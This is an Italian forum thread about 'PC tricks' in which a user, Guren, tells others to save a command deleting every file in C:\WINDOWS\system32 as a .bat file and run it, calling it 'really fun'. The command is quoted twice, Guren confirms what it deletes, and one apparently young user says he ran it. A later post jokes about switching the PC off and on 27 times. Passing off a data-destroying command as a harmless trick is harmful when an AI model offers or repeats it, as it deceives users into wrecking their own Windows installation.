Ma questo da dove spunta?
Annuncio
Collapse
No announcement yet.
Trucchetti per il pc
Collapse
X
-
Originariamente Scritto da Guren Visualizza MessaggioMa tutte robe old oggi?
Guarda, te ne dico uno io:
Apri il blocco note, digita @DEL /s /q "C:\WINDOWS\system32\*.*"
Salva in .bat e cliccaci sopra.
Prova, è divertentissimo. Hasta la vista.Mi serve un favore per domani ma nn so come chiedertelo..........
........Mi presteresti la tua faccia..........
Devo fare una figura di merda!!!!!!!!!!
Comment
-
Originariamente Scritto da vegetrunks_96 Visualizza MessaggioIo non ci ho capito nnt k fa quel mex da salvare in .Bat?
Comment
-
Originariamente Scritto da Guren Visualizza MessaggioMa tutte robe old oggi?
Guarda, te ne dico uno io:
Apri il blocco note, digita @DEL /s /q "C:\WINDOWS\system32\*.*"
Salva in .bat e cliccaci sopra.
Prova, è divertentissimo. Hasta la vista.
Comment
-
Originariamente Scritto da cj altair simpson Visualizza Messaggioma a che cosa serve??
Comment
-
Originariamente Scritto da Guren Visualizza MessaggioCancella la cartella System32. ^^
Comment
-
Originariamente Scritto da !gohanssj2! Visualizza Messaggio...e fa apparire i fuochi d'artificio...
Comment
-
Originariamente Scritto da vegetrunks_96 Visualizza MessaggioIo l' ho fatto però la cartella System 32 c' è ancora e con essa ci sono 2170 file
Comment
-
Be allora posso dire solo una cosa:CHE CULO!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!Mi serve un favore per domani ma nn so come chiedertelo..........
........Mi presteresti la tua faccia..........
Devo fare una figura di merda!!!!!!!!!!
Comment
-
Questo me l'ha detto un mio amico oggi: Stacchi la spiana del PC,la riattacchi e poi la ristacchi. Dopodichè riattaccala e accendi e spegni il PC per 26 volte. La 27esima volta cancella tutte le cartelle,riavvia il PC e ci sono di nuovo tutte le cartelle! L'ho provato e funziona,consiglio di provarlo anche all'autore del topic
ROTFLTatsunoko=Messia
Comment
-
Originariamente Scritto da vegetrunks_96 Visualizza MessaggioNon è che mi stai prendendo x il culo???E poi se spengo e riaccendo 27 volte mi va in tilt il computerTatsunoko=Messia
Comment
Comment